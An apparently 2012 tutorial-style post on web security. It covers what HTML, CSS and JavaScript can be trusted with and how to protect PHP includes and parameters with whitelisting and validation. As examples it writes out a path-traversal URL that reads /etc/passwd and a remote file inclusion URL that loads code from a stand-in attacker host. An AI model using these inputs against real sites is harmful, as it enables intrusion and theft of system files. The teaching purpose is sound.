Wednesday, March 14, 2012

HTML Security

Click Here! For More Info

Because you likely do not have much to do with your server let’s focus on things you do have full control of.
HTML

HTML is pretty safe. It is simply converted into text—no interaction with the server or calculations—so not much can go wrong. That said, you should always use HTML for what it’s for:

    * HTML structures your content.
      HTML is not a database to store information. The reason it is not is because you cannot rely on HTML content to stay unchanged. Anyone could use browser debugging tools to mess around with your HTML and change the content. So you run into security issues with JavaScript solutions that rely on data in the HTML and don’t check the server for what that data is allowed to be.
    * HTML is fully visible.
      Don’t use comments in the HTML to store sensitive information, and don’t comment out sections of a page that are not ready yet but that point to parts of an application that are in progress.
    * Hiding things doesn’t make them go away.
      Even if you hide information with CSS or JavaScript, some people can get it anyway. HTML is not there to give your application functionality; that should always happen on the server.

A wonderful example of insecure HTML was the drop-down menu on the website of a certain airline. This menu let you define the seating class you wanted to fly in as the last step before printing your voucher. The website rendered the HTML of the drop-down menu and commented out the sections that were not available for the price you had selected:
view source
print?
1    <select name="class">
2      <option value="ec">Economy</option>
3      <option value="ecp">Economy Plus</option>
4      <!--
5      <option value="bu">Business</option>
6      <option value="fi">First</option>
7      -->
8    </select>

The server-side code did not check to see whether you were eligible for a first-class ticket; it simply relied on the option not being available. The form was then sent via JavaScript. So, all you had to do to get a first-class ticket for the price of an economy seat was use FireBug 23 to add a new option to the form, select the value you wanted and send it off.
CSS

CSS is not really capable of doing much to the document and cannot access the server… for now. One problem with CSS is background images that point to URIs. You can inject code by somehow overriding these. The same applies to the @import property for other style sheets.

Using expression() in Internet Explorer to make calculations (or, as in most cases, to simulate what other browsers can already do) is dangerous, though, because what you are doing in essence is executing JavaScript inside a CSS block. So, don’t use it.

CSS changing a lot now, and we are giving it more power than ever before. Generating content with CSS, animation, calculations and font embedding all sound absolutely cool, but I get a prickly feeling in the back of my neck when I look at it right now.

Attack vectors have two features: they have the power to change the content of a document, and they are technologies that are not proven and are changing constantly. This is what CSS 3 is right now. Font-embedding in particular could become a big security issue, because fonts are binary data that could contain anything: harmless characters as well as viruses masquerading as a nice charset. It will be interesting to see how this develops.
JavaScript

JavaScript makes the Web what it is today. You can use it to build interfaces that are fun to use and that allow visitors to reach their goals fast and conveniently. You can and should use JavaScript for the following:

    * Create slicker interfaces (e.g. auto-complete, asynchronous uploading).
    * Warn users about flawed entries (password strength, for instance).
    * Extend the interface options of HTML to become an application language (sliders, maps, combo boxes, etc.)
    * Create visual effects that cannot be done safely with CSS (animation, menus, etc.)

JavaScript is very powerful, though, which also means that it is a security issue:

    * JavaScript gives you full access to the document and allows you to post data to the Internet.
    * You can read cookies and send them elsewhere.
    * JavaScript is also fully readable by anyone using a browser.
    * Any JavaScript on the page has the same rights as the others, regardless of where it came from. If you can inject a script via XSS, it can do and access whatever the other scripts can.

This means you should not try to do any of the following in JavaScript:

    * Store sensitive information (e.g. credit card numbers, any real user data).
    * Store cookies containing session data.
    * Try to protect content (e.g. right-click scripts, email obfuscation).
    * Replace your server or save on server traffic without a fallback.
    * Rely on JavaScript as the only means of validation. Attackers can turn off JavaScript and get full access to your system.
    * Trust any JavaScript that does not come from your server or a similar trusted source.
    * Trust anything that comes from the URI, HTML or form fields. All of these can be manipulated by attackers after the page has loaded. If you use document.write() on unfiltered data, you expose yourself to XSS attacks.

In other words, AJAX is fun, but do not rely on its security. Whatever you do in JavaScript can be monitored and logged by an end user with the right tools.
PHP (or Any Server-Side Language)

Here be dragons! The server-side language is where you can really mess up if you don’t know what you’re doing. The biggest problems are trusting information from the URI or user entry and printing it out in the page. As shown earlier in the XSS example with the colors, you will be making it easy to inject malicious code into your page.

There are two ways to deal with this: whitelisting and proper filtering.

Whitelisting is the most effective way to make sure nothing insecure gets written out. The trick is easy: don’t use information that gets sent through as the output; rather, just use it in conditions or as lookups.

Let’s say you want to add a file on demand to a page. You currently have these sections on the page: About Us, Contact, Clients, Portfolio, Home, Partners. You could store the data of these in about-us.php, contact.php, clients.php, portfolio.php, index.php and partners.php.

The amazingly bad way to do this is probably the way you see done in many tutorials: a file called something like template.php, which takes a page parameter with the file name.

The template then normally contains something like this:
view source
print?
1    <?php include($_GET['page']);?>

If you call http://example.com/template.php?page=about-us.php, this would load the “About Us” document and include it in the template where the code is located.

It would also allow someone to check out all of the other interesting things on your server. For example, http://example.com/template.php?page=../../../../../../../../etc/passwd or the like would allow an attacker to read your passwd file.

If your server allows for remote files with include(), you could also inject a file from another server, like http://example.com/template.php?page=http://evilsite.net/exploitcode/2.txt?. Remember, these text files will be executed as PHP inside your other PHP file and thus have access to everything. A lot of them contain mass-mailers or check your system for free space and upload options to store data.

In short: never, ever allow an unfiltered URI parameter to become part of a URI that you load in PHP or print out as an href or src in the HTML. Instead, use pointers:
view source
print?
01    <?php
02    $sites = array(
03      'about'=>'about-us.php',
04      'contact'=>'contact.php',
05      'clients'=>'clients.php',
06      'portfolio'=>'portfolio.php',
07      'home'=>'index.php',
08      'partners'=>'partners.php'
09    );
10    if( isset($_GET['page']) &&
11        isset($sites[$_GET['page']]) &&
12        file_exists($sites[$_GET['page']]) ){
13          include($sites[$_GET['page']]);
14    } else {
15      echo 'This page does not exist on this system.';
16    }
17    ?>

This way, the parameters become not a file name but a word. So, http://example.com/template.php?page=about would include about-us.php, http://example.com/template.php?page=home would include index.php and so on. All other requests would trigger the error message. Note that the error message is in our control and not from the server; or else you might display information that could be used for an exploit.

Also, notice how defensive the script is. It checks if a page parameter has been sent; then it checks if an entry for this value exists in the sites array; then it checks if the file exist; and then, and only then, it includes it. Good code does that… which also means it can be a bit bigger than expected. That’s not exactly “Build your own PHP templating system in 20 lines of code!” But it’s much better for the Web as a whole.

Generally, defining all of the variables you will use before you use them is a good idea. This makes it safer even in PHP set-ups that have globals registered. The following cannot be cracked by calling the script with an authenticated parameter:
view source
print?
1    $authenticated = false;
2    if($_POST['username'] == 'muppet' &&
3       $_POST['password'] == 'password1') {
4        $authenticated = true;
5    }
6    if($authenticated) {
7      // do something only admins are allowed to do
8    }

The demo we showed earlier makes it possible to work around this, because $authenticated was not pre-set anywhere.

Writing your own validator function is another option. For example, the color demo could be made secure by allowing only single words and numbers for the colors.
view source
print?
01    $color = 'white';
02    $background = 'black';
03    if(isset($_GET['color']) && isvalid($_GET['color'])){
04      $color = $_GET['color'];
05      if(ishexcolor($color)){
06        $color = '#'.$color;
07      }
08    }
09    if(isset($_GET['background']) && isvalid($_GET['background'])){
10      $background = $_GET['background'];
11      if(ishexcolor($background)){
12        $background = '#'.$background;
13      }
14    }
15    function isvalid($col){
16      // only allow for values that contain a to z or 0 to 9
17      return preg_match('/^[a-z0-9]+$/',$col);
18    }
19    function ishexcolor($col){
20      // checks if the string is 3 or 6 characters
21      if(strlen($col)==3 || strlen($col)==6){
22        // checks if the string only contains a to f or 0 to 9
23        return preg_match('/^[a-f0-9]+$/',$col);
24      }
25    }

This allows for http://example.com/test.php?color=red&background=pink or http://example.com/test.php?color=369&background=69c or http://example.com/test.php?color=fc6&background=449933, but not for http://example.com/test.php?color=333&background=&lt/style>. This keeps it flexible for the end user but still safe to use.

If you are dealing with content that cannot be easily whitelisted, then you’ll need to filter out all the malicious code that someone could inject. This is quite the rat-race because new browser quirks are being found all the time that allow an attacker to execute code.

The most basic way to deal with this is to use the native PHP filters on anything that comes in. But a quite sophisticated package called HTML Purifier 24 is also available.